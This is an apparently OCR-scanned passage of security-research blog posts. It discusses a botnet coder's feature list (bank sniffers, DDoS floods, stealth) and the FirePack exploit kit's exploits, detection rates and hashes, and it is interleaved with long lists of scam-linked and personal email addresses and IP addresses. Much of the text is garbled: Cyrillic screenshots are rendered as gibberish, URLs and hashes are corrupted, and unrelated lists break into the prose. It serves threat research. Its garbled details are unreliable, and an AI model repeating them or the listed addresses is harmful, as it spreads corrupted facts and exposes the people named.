their directory permissions right, leads us to a a first-hand malware bot’s to-do list courtesy of 
the coder itself. Here’s the to-do list itself, with all the static and variable features : 


Spreading the malware 

- NetAPI spreading 

- VNC spreading 

- MSN spreading 

- ICQ spreading 

- Email spreading 

- Seeding via torrent (warez) 
- Downloading (ftp & http) 


1464 


BillB@cargodelivery.biz 
WarrenC@cargodelivery.biz 
JimG@cargodelivery.biz 
KaeithG@cargodelivery.biz 
PaulH@cargodelivery. biz 
TomK@cargodelivery.biz 
JimR@cargodelivery.biz 
RogerG@cargodelivery.biz 
MikeB@cargodelivery.biz 
support@oka-overseas.com 
office@onaodna.com 
hr@onaodna.com 
lapinska@onaodna.com 
job@onicks-group-eu.cc 
careers@onis-group.com 
contract@onlinecompanysite.net 
Xxxxx@hotmail.com 
info@currencysource.com 
moist@8081.ru 

ezra@co5.ru 
job@opm-groupmain.kz 
job@search-bbb.com 
job-department@orion-logistic.info 
admin@parabellum.us 
support@parabellum.us 
job@parabellum.us 
webmaster@parabellum.us 
jamesgregg@ovbrokerage.com 
support@ovdeco.org 
info@pac-corp.com 
andrew.byrd791@punkass.com 
XXXXX@xxxxx.freeserve.co.uk 
XXXX@xxxxx.freeserve.co.uk 
XXXXXXXXXXXXXX.XXXXXXX@Mwinf3202.me.freeserve.com 


XXXX @XXXXXX.freeserve.co.uk 
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XXXXXXXXX.XXXXXXXXX@Mwinf3202.me.freeserve.com 
noc@securedprivatenetwork.net 
websales@convergentns.net 
service@convergentns.net 
billing@convergentns.net 
sales@softlayer.com 
support@softlayer.com 
sales@convergentns.net 
noc@convergentns.net 
XXXXXX@XXXxXxX.COM 
Cecil._Lunsford@hotbox.com 
lawn@ml3.ru 
careers@pradisetouristics.com 
staffmanager@paramount-finance.com 
support@parcelalliance.com 
rains@bigmailbox.ru 
info@paymate-solutions.org 
jan@paymate-solutions.org 
business@paymate-solutions.org 
lisindab@yahoo.com 
hr@payresult.us 
job@perfectusa-inc.cc 
yvonnetay@xxxxxxx.com 
IvanKrasikov@hotmail.com 
careers travel@yahoo.com 
alexkovalskiphc@gmail.com 
uk@phcconsulting. biz 
usa@phcconsulting. biz 
au@phcconsulting.biz 
job@phoenix-groupmain.com 
info@PJ-Equipments.com 
info@pk-solicitors.com 
info@platinum-funds.us 
jan@platinum-funds.us 


business@platinum-funds.us 
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job@platinum-groupinc.com 
nest@blogbuddy.ru 
hr@pl-pro.net 

emily@pl-pro.net 
emily@platpro.net 
polandautoparts@gmail.com 
zeuspriority@gmail.com 
sales@polandre.net 
office@polfreight.com 
hr@polfreight.com 
hiring@portefinancial.com 
admin@portefinancial.com 
silksdarts@aol.com 
manager@postbuisness.com 
job@premier-groupinc.com 
gone@corporatemail.ru 
job@prestige-groupinc.com 
job@prime-groupco.com 
career@principlepartnersworld.com 
support@PBCgroup.org 
careers@professionalassistants-company.com 
jobs@prof-escrow-group.com 
20job@profit-financing-mail.cn 
job@profit-financing-mail.cn 
guangzhou@projection-technologies.com 
info@investspromo.net 
info@investsales-promo.us 
derylwashing7261@yahoo.com 
job@prospera-groupli.cn 
job@puritan-groupinc.com 
hiring@ramsinternational.com 
mail@ramsinternational.com 
mold3332avimo@safe-mail.net 
stailsbestia@care2.com 
servicesS@123-reg.co.uk 
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DDoS features 
- general ddos attacks (udp &tcp) 
- tsunami ddos (push +ack flood) 


Scanning features 
- latest vulnerabilities scan 
- exploits scann for homepages (php/perl/cgi scripts (not a priority) 


Sniffers and interceptors 
- bank sniffer & readers 

- paypal 

- boa 

- egold 

- nationwide 

- USW. 

- game reader 

- steam 


Misc features 

- encrypted config 

- better clonning function (with timer based join (no massjoin)) + fixed channel messages 

- noise at network sniffer (e.g.: honeypot (tool either shutdown and/or blocked)) 

- invisible to task manager 

- more configuration settings 

- melt exe on startup (true/false) 

- startup (error) message editable (e.g.: (you need windows vista to run this programm) or 
(successfully installed)) 

- undetected source code 


And while this wannabe botnet master is trying to achieve self-sufficiency, thereby slow- 
ing down the development process, others are not so close minded and are actively building 
communities around their malware botnets by releasing the source code for free, [5]enjoying 
the innovation added by third party coders wanting to contribute to the community, where 
the bottom line is the [6]Jinevitable localization of the bot to other languages once enough 
features have been developed to distinguish it among the rest of the commodity malware bots. 


From a wannabe botnet master’s perspective, the more propagation vectors added, the 
higher the probability for infection, however, the probability for infection is also proportional 
with the probability for detection on behalf of researcher’s and vendors honeyfarms. And 
therefore, would less noise would mean slow infection rate, but higher lifecycle due to the 
less noise generated? The Stormy Wormy people for instance entirely relied on perhaps the 
most noise generation method - email distribution with malware hosted on IPs, however, 
their persistence and strategy to put more efforts into ensuring that no matter samples get 
obtained in the first couple of minutes a campaign is launched, the botnet itself should be 
harder to shut down. 
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publicinfo@rbarneshome.org 
staffmanager@rangefinance.com 
hiring@rangefinance.com 
publicinfo@rwashingtonhome.org 
publicinfo@rgraveshome.org 
job@reach-group.cc 

rick _morris@yahoo.com 
raulg@realteam-design.com 
info@realteam-design.com 
support@realteam-design.com 
abuse@realteam-design.com 
orders@realteam-design.com 
jozef.komorowski@yahoo.com 
job@realtek-groupnet.cn 
general@realtyone.co.uk 
careers@realtyone.co.uk 

susan _roberts@realtyone.co.uk 
julia _nowak@realtyone.co.uk 
job@realsixsigma.net 
support@realsixsigma.net 
admin@realtypower.net 
support@realtypower.net 
job@realtypower.net 
webmaster@realtypower.net 
job@redeye-groupco.com 
job@regency-groupco.com 
support@remingtonfinance.com 
remingtonfinance@aol.com 
job@rengo-groupmain.com 
abhor@co5.ru 

jaded@co5.ru 

max _rengo@yahoo.com 
20support@reynolds-inc.com 
support@reynolds-inc.com 


20job@reynolds-inc.com 
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job@reynolds-inc.com 
office@rimmsystem.com 
switz@rimmsystems.com 
poland@rimmsystems.com 
ROBERTINA@superlop.com 
|.thompson303@hotmail.com 
info@rochampbenz.com 
publicinfo@rarnoldhome.org 
publicinfo@rlawrencehome.org 
Ronald. Young@rlawrencehome.org 
info@romadfinancial.com 
job@recruitromadfinancial.com 
hiring@romadfinancial.com 
publicinfo@rjenkinshome.org 
Clayton.Ramirez@rjenkinshome.org 
rc@rossenbaum.com 

shane _farr@xxxx.com 
geoffmaxwell1871@gmail.com 
job@safegroupsvc.cn 
publicinfo@srosehome.org 
career@santarextoys.net 
job@saturn-groupsvc.com 
office@superlop.com 
job@scope-group.cc 
golansur2@googlemail.com 
20job@secure-financing-mail.cn 
job@secure-financing-mail.cn 
job@secure-operations.net 
job@securities-groupinc.cn 
info@seomosaic.com 
ernestpolley@gmail.com 
fred.stanley5@gmail.com 
meier.seidemann.se.hr@gmail.com 
steven.white@serversolutions.us 
swhite.manager@gmail.com 
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support@s-services.org 
contact@s-services.org 
job@ShallerFinance.com 
recruitment@shelffinoilandgas.com 
grishunineynajen@yandex.ru 
y93e793k5qa@networksolutionsprivateregistration.com 
career@shippingcorp.com 
job@shopping-provider.com 
info@shopping-provider.com 
job@shopping-assistance.net 
info@siberiahunting.com 
rinaldoguido@ymail.com 
job@sigmarealty.net 
info@silver-finance.biz 
jan@silver-finance.biz 
business@silver-finance.biz 
HR _manager@silverlenslab.com 
admin@silverwoodfinancial.com 
20job@simple-investments-mail.org 
job@single-groupinc.cn 
koretloken@yahoo.com 
director@climbing-games.com 
job@sky-group-us.eu 
Sky.group.job@gmail.com 
XXXXXxXxX@singnet.com.sg 
pammorrison277@hotmail.com 
contact.mail@smarthomesyst.com 
mullen.olivia@smarthomesyst.com 
olivia.mullen@smarthomesyst.com 
tyler.j.smartlogistics@gmail.com 
smart.sa@smarttech-house.com 
smarttech@smarttech-house.com 
oliviastephan.dep.manager@smarttech-house.net 
smart.house.work@gmail.com 
job@smtp-group.cc 
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don.ram@yahoo.com 
info@mainsoft-Itd.com 
CandidateEmail@job.careerbuilder.com 
hr@solutcons.com 
info@solutcons.com 
job@solvent-group.com 

belt@co5.ru 
info@southwoolland.com 
rips@fastermail.ru 
job@spalgroupmain.cn 
20job@sp-group-mail.cn 
job@sp-group-mail.cn 
careers@Spintex.com 
careers@spintexag.com 
spintexag.com@easyspaceprivacy.com 
job@spread-groupmain.cc 
info@stainvestmentsuk.com 
job@star-groupsvc.com 
manager@startravelcompany.com 
Manager.StarTravel@gmail.com 
M.Rodriguez@withstartravel.com 
20job@star-group-oz.eu 
job@star-group-oz.eu 
Empl.star@gmail.com 
job@star-group-eu.eu 
job.statecorp@gmail.com 
mail@statecorporate.com 

steffen jewels@steffen-gems.com 
steffen jewels@steffendesign.com 
job@stock-groupmain.cc 
gelb.look@yahoo.com 
stockli_gd@stockligemsanddiamonds.com 
stockli.gd.thomas.emma@gmail.com 
ntnmscwO9@gmail.com 
job@strol-groupli.cn 
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pubs@maillife.ru 

sues@5mx.ru 
ernestlusteck90@live.com 
departmentstaff@sunriserepairs.net 
head.office@sunriserepairs.net 
france@sunriserepairs.net 
germany@sunriserepairs.net 
chech.republic@sunriserepairs.net 
business@sunriserepairs.net 
miller.elsa.erlin.Ar@gmail.com 
s.weber.sfm@gmail.com 
mblanc@sfmanagement.net 
stefanie.weber@sfmanagement.net 
pascal.friederich@sfmanagement.net 
k.julia@sfmanagement.net 
support@sfmanagement.net 
mblanc.swiss@gmail.com 
support@domain.com 
piter@domain.com 
bush.w.j@domain.com 
ligal@domain.com 
RodolfoStevensonPM@gmail.com 
contact.szc@gmail.com 
coreyburluck@gmail.com 
job@tdk-group.cc 
sales@tenturio.org 
support@terracargo.tk 
texxton@gmail.com 
info@log-magart.com 
info@robertwahle.com 
career@ourmanagers.com 
job@theshippingexpress.com 
hr@toft-group.com 
mail@tollfinance.com 


staffmanager@tollfinance.com 
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toshibaukincnet@msn.com 
job@totalgroupinc.cn 
office@tractorworld-Itd.com 
support@tractorworld-ltd.com 
dudullee@gmail.com 
andrew7d@googlemail.com 
yete235s@googlemail.com 
ferr332@googlemail.com 
ettgg5@googlemail.com 
job@trans-groupinc.com 
wynn@co5.ru 

cover@freemailbox.ru 

ron _fergett@yahoo.com 
stiv2007@yahoo.com 
info@trans-atlanta.net 
soskvoch@gmail.com 
transbridge@ymail.com 
info@transferinvest.com 
service@transferinvest.com 
support@transitsystem-express.com 
karlheinz@tranzwest.com 
publicinfo@tgilberthome.org 
contact@treenity-realty.com 
accountsdept@trinitronchaseltd-email.com 
ellinasecton521@sify.com 
accountsdept@trinitrontb-email.com 
support@trustlinelogistics.com 
bestseller@gm«x.fr 
staffmanager@tr-wires.com 
job@tvsgroupli.cn 
tyler.group@yahoo.com 
job@tylersgroup.com 
danielalvarez@ultraweb-solutions.com 
danielalvarez@ultraweb-solutions.net 


info@ultraweb-solutions.com 
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| http://adanchev blogspot .con/2008/04/quality-and-assurance-in-nalwvare hea! 

_ het: //adanchev blogspot. con/2007/10/miltple-#irevalle- bypassing. hem] 

. http: //ddanchev. blogspot . com/2006/09/benchmarking-and-optimising-malware. html 


ttp://ddanchev. blogspot .com/2007/09/custom-ddos-capabilities-within-malware. html 


AuRWNE 


. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 


4.4.24 The FirePack Exploitation Kit - Part Two (2008-04-27 11:27) 


CTaTHcTHKa 3apaxeHHble Pedepanbi ¥npaBnenne 


Sarpy3ka daina [7] 
| Barpysure_| 


BoinonHuth gZeictBue 


[-] Ounctka ctaTHeTHKH 
BeinonHmMTe | 


Cmeua napona 


HoBbili NornH [admin 
HosBbii naponb | 
CMeHHTE | 


Has the web malware exploitations kits cash bubble popped already? A recently released, 
yet another proprietary version of the [1]Firepack malware exploitation kit and its largely de- 
creased price from the original one, which in February was $3000, speaks for itself. Firepack’s 
original version was a great example of biased exclusiveness on behalf of the malicious parties, 
wanting to quickly cash in by pitching a new and undetected malware kit, and literally zero 
differentiaton factor next to now commodity web malware exploitations kits such as IcePack 
and MPack. 


The original Firepack kit came with six exploits included within, and more to come in the 
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scheduled updates to come. The exploits, and the current signature based detection rates are 
as follows : 


CTaTHcTHKa SapaxXeHHbie Pedepanbi ¥npaBnenne 


Npo6ues: 
Sanpocos: 0 


= Npobueos: O 
Npobue: 0 % 
leternet Laggarer 


Bpay3ep XuTos 


FF5B341AC.php - MSIE 6 
EF57CCF90.php - MSIE 7 
EF57CCF90.php - Firefox 1 
CCF45A00D. php - Firefox 2 
CCF45A00D.php - Opera 7 
99FFC5BA4.php - Opera 9 


OOFAA7CF5.php 

Scanners result : 11/32 (34.38 %) 

HTML/MSO6006.DF! exploit; Exploit-MSO06-006.gen 

File size: 3685 bytes 

MD5...: ed71d57ddf70a5993b34e3bbcda23f2d 

SHA1..: ccOeceb9e8cc3475752c959be70204b6f4d82168 
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rook@ca4.ru 

ira@bz3.ru 

ours@ca4.ru 

zoe@ca4.ru 
judo@free-id.ru 
el@cheapbox.ru 
flip@free-id.ru 
our@ca4.ru 
most@cheapbox.ru 
jaunt@cheapbox.ru 
yule@cheapbox.ru 
liszt@bz3.ru 
room@yourisp.ru 
twig@ppmail.ru 
till@cheapbox.ru 
swiss@ca4.ru 
shoot@ppmail.ru 
lost@ppmail.ru 
pecks@free-id.ru 
cynic@free-id.ru 
knelt@ca4.ru 
w@yourisp.ru 
sons@bz3.ru 
admin@acwoode-group.com 
admin@acwoode-group.net 
14646 


admin@art-groupintegreted.com 
crony@cutemail.org 
saps@cutemail.org 
admin@complete-art-uk.net 
plods@fxmail.net 
admin@condor-llc-uk.net 
admin@contemp-usainc.com 
admin@contemp-usgroup.com 
cents@mailae.com 
web@derwoode-group.cc 
abcs@mailti.com 
admin@elenty-llc.com 
admin@gapsonart.net 
admin@glacis-groupuk.net 
admin@guru-group.cc 
jj@cutemail.org 
uq@mail13.com 
admin@integrated-europe-it.net 
admin@itagroup-usa.net 
yea@mailae.com 
admin@itanalysisgroup.net 
zigzag@fxmail.net 
day@mailae.com 
glamor@fxmail.net 
admin@nartenart.net 
prissy@mailae.com 
xe@fxmail.net 
admin@scar-beiinc.com 
blurs@mailae.com 
admin@skyline-Itd.net 
admin@smartllc-uk.com 
pol@mailae.com 
admin@special-artuk.com 
admin@sublimeltd.com 


admin@todex-group.net 
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admin@atlanta-Itd-uk.net 
admin@derwart-group.at 
tolls@mailti.com 
support@it-amira.net 
admin@itamira-de.com 
admin@itserv-de.co 
admin@kade-group.com 
east@mail13.com 
admin@mendryltd.com 
admin@devotion-company.com 
berra@cutemail.org 
alibi@mailae.com 
cause@ca4.ru 
admin@parlen-grouplic.com 
admin@quad-it-group.com 
cola@mailae.com 
admin@quinta-groupus.com 
admin@quinta-llc.net 
admin@rextechinnovation.com 
blurt@fxmail.net 
admin@rextechlitd-us.com 
admin@special-art-Itd.com 
admin@sublime-ltd.net 
admin@targetmarketgroup-llc.cc 
admin@tazprogltd-us.co 
admin@vnsproject-de.cc 
admin@vortexllc-uk.com 
admin@vortex-llc-uk.net 
slows@5mx.ru 
etude@qx8.ru 
bowie@bigmailbox.ru 
spout@freenetbox.ru 
sharp@maillife.ru 
tarts@freenetbox.ru 
excess@bigmailbox.ru 
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low@bigmailbox.ru 
frost@bigmailbox.ru 
info@dnregistrar.ru 
crime@bigmailbox.ru 
weds@fastermail.ru 
mylar@5mx.ru 
gutsy@qx8.ru 
tabs@5mx.ru 

hv@qx8.ru 

jerks@5mx.ru 
mat.mat@yahoo.com 
okay@qx8.ru 
cde@freenetbox.ru 
ti@fastermail.ru 
logic@qx8.ru 
gv@fastermail.ru 
glean@fastermail.ru 
thaws@bigmailbox.ru 
carlo@qx8.ru 
omega@fastermail.ru 
thash@yahoo-inc.com 
outsource.kyle.hr@gmail.com 
admin@outsourceduk.net 
savagematt32@ymail.com 
justin@caratnetworks.com 
hostmaster@outsourceduk.net 
Graf.frdblanton@gmail.com 
tonygraf3@gmail.com 
cgstaffing@yahoo.com 
admin@Cgstaffing.com 
support@Cgstaffing.com 
job@Cgstaffing.com 
webmaster@Cgstaffing.com 
info@cgstaffing.net 


sup-dns@openhosting.ru 
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1EE16C6C.BCC1D2C9@accountant.com 
amacorpq@accountant.com 
waynensheri@sbcglobal.net 
bobkat731@sbcglobal.net 
eric.schaefer@sbnincmail.com 
agent@britain-careers.com 
abuse@btc-net.bg 

registry@btc-net.bg 
lyubomir.georgiev@btc-net.bg 
stanish.stanishev@btc-net.bg 
sunbizteam@gmail.com 
ipadmin@softlayer.com 
abuse@softlayer.com 
root@onl.online-parttime-jobs.com 
ofesmith2@yahoo.com 
dnsadmin@securedservers.com 
abuse@securedservers.com 
ipadmin@securedservers.com 
madihrb@hotmail.com 
ELITESTAFFINGUSA.COM@domainsbyproxy.com 
support@websitewelcome.com 
ipadmin@websitewelcome.com 
dnsadmin@gator397.hostgator.com 
brucezailo@live.com 
brucezailo@techrelations.net 
he37@techrelations.net 
559hn-3321288065@job.craigslist.org 
techrelations.net@protecteddomainservices.com 
netblockadmin@yahoo-inc.com 
nicoluhsoasarucedmond@hotmail.com 
mylot@emc-online.com 
ec2-abuse@amazon.com 
aes-noc@amazon.com 
nstld@verisign-grs.com 
root@amazon.com 
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department@gnpcghcom.com 
ziahaq21@hotmail.com 
global.london@gmail.com 
sales.gisahmedabad@gmail.com 
info@365jobs4u.com 
gisahmedabad@gmail.com 
uk@365jobs4u.com 
xr9gh-3288888327@job.craigslist.org 
Abuse@hostwinds.com 
support@hostwinds.com 
logs@hostwinds.com 
sqicc@gmx.us 

sqi-cc@gmx.us 
ui-hostmaster@1land1.com 
abuse@schlund.de 
hostmaster@perfora.net 
kkvsoftlinkOl@gmail.com 
kkvsoftlinkO24@lycos.com 
kkvsoftlink@gmail.com 
hostmaster@schlund.de 
vng7h-3263645102@job.craigslist.org 
lucasmiller45@yahoo.com 
support@netfirms.com 
abuse@asmallorange.com 
none@none.com 
proxy3485107@1and1-private-registration.com 
hrdesk200@ymail.com 
GabrielleaGrahamTour@gmx.us 
howard.grand.job@gmail.com 
jobresume.financial@gmail.com 
kiki9261@yahoo.com.tw 
root@box792.bluehost.com 
hr@gianttons.com 
edwardperezgt@gmail.com 


melissa@pantronixassociation.com 
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4ff3671c9yffi8rc@tO2cduv4f7f99a255f64.privatewhois.net 
4ff3671c94f3lj9|I@tO2cduv4f7f99a255f64. privatewhois.net 
4ff3671cu0b31f98@tO2cduv4f7f99a255f64.privatewhois.net 
abuse@websitewelcome.com 

root@gator895.hostgator.com 
mi2dq8l4fcc6f183ae3c@tO2cduv4f7f99a255f64.privatewhois.net 
hnu05zw4fcc6f183d146@tO2cduv4f7f99a255f64.privatewhois.net 
bd1183x4fcc6f183c2d7@tO2cduv4f7f99a255f64.privatewhois.net 
root@gator74.hostgator.com 

pauly111@gmx.com 

karlafullernrm@bposervicetr.com 

lamarllc.gr@gmail.com 

job@lamar-llc.com 

amac@cyberservices.com 

contact@hometeamsystems.com 
HOMETEAMSYSTEMS.COM@domainsbyproxy.com 
Jewel@joblinesusa.com 

emissaryi@buxrud.se 

millionaire@retela.co.jp 

flimsiestc128@rsi.com 

scrabblesodty5@ameriton.com 

caliberu@naahq.org 

hmargo53@gmail.com 

lvy@usaitcareer.com 

admin@usaitcareer.com 

admin@top10jobbs.com 

twinetourt@aol.com 

abuse@rapidswitch.com 

ripe@iovps.com 

abuse@iovps.com 

richard@iomart.com 

job@river-groupinc.cn 

julieheart979@gmail.com 

remylawrencejr@gmail.com 


hr@eurocomcareers.com 
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Ctpana XutTos Mpowenxt 


Ukraine al 50 % 
United States 1 50 % 


99FFC5BA4.php 

Scanners result : 6/32 (18.75 %) 
Trojan.DL.Script.JS.Agent.low; Exploit-OperaTN 

File size: 1815 bytes 

MD5...: 166fa42343dd59d941e24177a0da9102 

SHA1..: €85701841a40c0017c06e2feb023272bff1b06f1 


CCF45A00D.php 

Scanners result : 15/32 (46.88 %) 
HTML/MS06006.BB!exploit; Exploit:JS/ShellCode.A 

File size: 5861 bytes 

MD5...: Ja6fe9ce8ed521ceb499954c944be812 

SHA1..: 4ad63cc7ee602b2f57032b4e524064ac459df150 


1468 


vacancy@icgold.us.com 
groupil@list.ru 
f.s.supp.g.sS@gmail.com 
asharahulpop@gmail.com 
registration@blida.info 
rinkya@bossmail.ru 
LugoaConsultServ@gmail.com 
UlteraGrLtd@aol.com 
GlobalTSgr@aol.com 


littmannstethoscopescompany.Itd@gmail.com 


CamaSale.Dept101@gmail.com 
iccjsc@googlemail.com 
iccjsc@gmail.com 
tgc.job@gmail.com 
andrey.kalitin@gmail.com 
applyrealnet@hotmail.com 
natali.globaltm@yahoo.ca 
poolltddir@aol.com 
HBBCGroup@gmail.com 
KinsellaMS@gmail.com 
SabatiniBC@gmail.com 

stock adver O07@yahoo.com 
torinotuningit@aol.com 
sockadverttadvert2k7@yahoo.com 
teztourde@aol.com 
capitsecurities@aol.com 
capitaltraderinc@aol.com 
stekmarkincs@aol.com 
expertsoftone@aol.com 
nekalay.semenov@gmail.com 
hr.cargo@mailzone.com 
DagnanSollnc@gmail.com 
mynescf.comp@gmail.com 
fina.mynescf@gmail.com 


private.reprsnt@gmail.com 
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private.repres@gmail.com 
private.rprs@gmail.com 
softforyourchild@aol.com 
priv.representatives@gmail.com 
private.represent@gmail.com 
hr.cargo@flashheadz.ws 
realway-std@rambler.ru 
sokolova.mary@gmail.com 
uksoftsell@aol.com 
uksoftselldirect@aol.com 
CreativelmpactLL@gmail.com 
CreativelSales@gmail.com 
dekids@gala.net 
Dylan@top10usajob.com 
velocityinglobal@hotmail.com 
carabell@mail-x.biz 
jobs@intersourceinc-us.com 
ripe@burst.net 
adam.hahn@burst.net 
hostmaster@intersourceinc-us.com 
info@aneag.net 
europeaustralia@aneag.net 
asiaafricazone@aneag.net 
devconf4@att.net 
abuse@limestonenetworks.com 
admin@limestonenetworks.com 
ipadmin@limestonenetworks.com 
noc@limestonenetworks.com 
admin@domain.net 
hr@ausevro.com 
SCAMFRAUDREPORT.ORG@domainsbyproxy.com 
Hunter@neuearbeitde.com 
admin@neuearbeitde.com 
Clement@careerin-finance.com 
info@careerin-finance.com 
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Dewayne@vacancy4usa.com 

Kris@guideusajob.com 

info@guideusajob.com 

Rickie@guideusajob.com 

Jacob@bestjobsus.com 

Jacob@guideusajob.com 

Emilio@careerin-finance.com 

contact@usmultipackcourier.com 
webmaster@usmultipackcourier.com 
alex.curtis.hr@thecorptravel.com 

zZ8b1Ihc4f851f9e2a571 @t02cduv4f7f99a255f64.privatewhois.net 
gufyk3e4f851f9e2d07f@tO2cduv4f7f99a255f64.privatewhois.net 
xfy3a7u4f851f9e2bcf9@tO2cduv4f7f99a255f64. privatewhois.net 
itsoft@itsoft.ru 

mboyarsk@iki.rssi.ru 

mb@rssi.ru 

diwo@uportal.ru 

ripe-dbm@ripe.net 

noc@plus.ru 

support@cloudns.net 

privacy@collegebound.net 

email@findtherightjob.com 

b.phillips@homejobsagency.co.uk 

job@itprimeltd.com 

zunichjms@usa.com 

dominique _piatti@hotmail.com 

hostmaster@casablanca.cz 

abuse@casablanca.cz 

lubos.pinkava@casablanca.cz 

admin@cz.cc 

servis@casablanca.cz 

support@namecheap.com 
9f38b587436649058cc0811497fc28a5.protect@whoisguard.com 
abuse@wyomingmediagroup.com 


support@wyomingmediagroup.com 
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root@youreducationalguide.com 
postmaster@prioritizehosting.com 
rff3n-3056456702@job.craigslist.org 
Alexandersimon5@aol.com 
Archie@premier-financials.com 
factsaboutinstanthumanresources@instanthumanresources.com 
factsabouttoospoiled@toospoiled.com 
factsaboutsadminsolutions@adminsolutionsgroup.net 
factsaboutGoodGradesNow@goodgradesnow.com 
FactsAboutUSAVoice@USAVoice.org 
FactsAboutAskAmerica@askamerica.org 
facts@veriresume.com 
factsaboutebandsearch@ebandsearch.com 
david.k.katz@gmail.com 
customerservice@paloozatalent.com 
elizabethfjohnson@msn.com 
oleggolub70@yandex.ru 

alexdu@sl.ru 

mostow@sl.ru 

seleznev@sl.ru 
info@websolutionsforbiz.com 
order@websolutionsforbiz.com 
support@websolutionsforbiz.com 
careers@websolutionsforbiz.com 
careers@teamwebconcepts.com 
info@teamwebconcepts.com 
support@teamwebconcepts.com 
order@teamwebconcepts.com 
kbrzj-3018350040@job.craigslist.org 
6dvh8-3012763135@job.craigslist.org 
maryannewiley2@gmail.com 
web@mailae.com 

ripe-mntner@hetzner.de 
ronny.biering@hetzner.de 

ripe@hetzner.de 
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abuse@hetzner.de 
peering@hetzner.de 
info@hetzner.de 
hostmaster@deexy-ltd.com 
postmaster@your-server.de 
candidateemail@site.careerbuilder.com 
admin@techadvise-uk.com 
hostmaster@techadvise-uk.com 
support@techadvise-uk.com 
thegiantsfanl1979@gmail.com 
copenhagen@turnerlw.com 
london@turnerlw.com 
newyork@turnerlw.com 
angelonweeks@yahoo.com 
hostmaster@1land1.co.uk 
abuse@oneandone.net 
ripe-role@oneandone.net 
noc@oneandone.net 
ncc@schlund.net 
uk@orientalxp.com 
ch@orientalxp.com 
us@orientalxp.com 
proxy2881272@1and1-private-registration.com 
info@decurdata.com 
careers@tbsltd.biz 
info@worldstream.nl 
abuse@worldstream.nl 
noc@confluence-networks.com 
ipadmin@confluence-networks.com 
sales@phoenixinfosoft.co.in 
karen.jO07@gmail.com 
job@correll-ltd.com 
abuse@leaseweb.com 
ripe@ocom.com 


ripe@leaseweb.com 
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job@techstratlimited.com 
nyhrdsandraadrian@cbproducttrad.com 
info@cbproducttrad.com 
registry@undeliverable.lambdanet.net 
ripe@23networks.net 
abuse@greatnet.de 
evolutes.group.hr@gmail.com 
job@evolutes-group.com 
selectionteam@post.com 
serrvicerecruit01@att.net 
sbentley1963@yahoo.com 
admin@mvp-interiors.com 
office@sitek.od.ua 

nivanko@odessa.net 

admin@sitek.od.ua 
Office@work-documents-translations.com 
contact@work-documents-translations.com 
ripe@powernet.bg 
recruitment@abroad-job-hire.com 
bitbucket@ripe.net 
susan.mccullough@workway.com 
hellsmash@gmail.com 
j.borislavov@icn.bg 

ripe@itdnet.net 

abuse@itdnet.net 
RESUMEBOOK360.COM@domainsbyproxy.com 
noc@rackspace.com 
abuse@rackspace.com 
ipadmin@rackspace.com 
postmaster@career-network.com 
job182203@advancedjobsapplication.net 
info@threestarsmedia.com 
kristie.dyer@jobnab.com 
careers@careernetworkjobs.com 


bsexton@kktv.com 
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lermanpetsupplies@gmail.com 
careers@skilledjobseekers.com 
careers@quickstrikecareers.com 
zoe.child@psdgroup.com 
ayman.eldifrawi@gmail.com 
jobs@esbbin.com 
rauschen@yahoo-inc.com 
hostmaster@site5.com 
aelbech8@yahoo.com 
PorterIndustrial.WandaD@gmail.com 
kelly.m.frances@gmail.com 
4404movingforward@gmail.com 
nothankyou@careeradvisorl.com 
Sample IPs known to have been hosting money mule recruitment scams in the past: 
88.255.94.83 

88.255.94.82 

192.5.5.241 

192.112.36.4 

212.16.129.198 
62.242.114.253 

77.248.56.229 

199.7.83.42 

82.131.46.35 

89.34.34.86 

89.114.53.86 

95.28.81.67 

192.36.148.17 

89.42.249.111 

74.62.155.11 

62.117.184.37 

221.12.43.189 

85.17.184.21 

194.169.192.141 

79.113.6.49 

79.118.92.145 
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79.113.173.83 
86.55.135.222 
89.39.239.122 
121.132.38.188 
85.197.99.144 
65.27.5.6 
67.11.52.253 
71.227.187.198 
$2.76.57:11 
89.149.225.96 
88.153.121.63 
67.82.17.59 
85.197.99.141 
7B.51-6.172 
82.255.218.53 
89.132.39.157 
84.3.92.192 
85.181.17.224 
87.15.16.15 
89.132.29.241 
74.62.155.57 
89.37.242.97 
78.52.147.3 
79.116.186.67 
82.146.52.112 
82.252.227.37 
85.216.157.32 
86.123.73.71 
84.58.216.44 
85.182.44.198 
86.126.78.254 
86.127.21.123 
66.212.28.188 
84.176.92.97 
88.162.249.29 
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74.15.215.49 
84.66.32.152 
85.181.45.119 
87.16.111.13 
99.227.131.239 
74.62.155.33 
24.178.69.4 
74.75.191.142 
62.149.18.151 
213.186.126.7 
213.186.126.34 
75.126.26.83 
199.19.54.1 
75.126.93.216 
64.28.181.194 
64.28.188.162 
83.142.48.5 
86.22.71.157 
86.55.234.157 
89.136.117.212 
1.1.1.1 
154.8.2.142 
88.255.78.75 
88.255.78.74 
69.16.243.46 
69.16.243.45 
61.16.243.45 
83.81.123.173 
72.29.78.58 
122.127.43.63 
221.127.21.222 
221.126.136.182 
221.126.99.93 
221.127.174.65 
59.188.134.239 
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61.223.94.71 
121.137.164.154 
59.149.39.73 
75.42.214.169 
78.94.6.195 
91.89.137.47 
61.18.164.85 
172.22.159.24 
58.65.237.74 
58.65.237.73 
81.176.236.12 
89.46.34.93 
89.46.37.173 
84.123.99.113 
125.139.235.157 
219.254.85.28 
221.34.239.33 
222.121.219.214 
69.216.136.173 
211.213.154.253 
211.247.196.139 
81.181.17.57 
86.121.173.169 
86.121.41.154 
211.183.138.175 
84.58.146.28 
85.179.85.151 
66.249.8.241 
62.57.88.143 
82.137.41.65 
87.69.27.165 
85.67.12.4 
82.137.41.99 
86.121.238.243 
212.117.32.32 
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EF57CCF90.php 

Scanners result : 18/30 (60 %) 

JS/MS05-054!exploit; Exp/MS06071-A 

File size: 6996 bytes 

MD5...: e5e3623838da4d0b7922a3cde229c7c3 

SHA1..: 2d951f1368311873321b6bfc292644b090f93305 


FF5B341AC.php 

Scanners result : 10/32 (31.25 %) 
Generic.XPL.ADODB.42D1EF40; Exploit-MS06-014 

File size: 2123 bytes 

MD5...: bacle03a64ba47a3005d435af8954cd6 

SHA1..: e46afa408445ac5f2331119b746605a4bf8d0904 


The latest release offered for $300, is entirely Internet Explorer centered, including all 

of the publicly available exploits for IE6 and IE7, with the natural modularity so that the buyer 

can include any set of exploits to serve of a large scale. 

[2]A proprietary tool or a service does not necessarily mean it outpaces a free one in terms of 
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222.235.171.221 
61.42.47.53 
62.21.35.254 
82.166.131.99 
87.69.111.179 
84.232.179.111 
86.121.111.247 
82.81.156.161 
83.31.44.98 
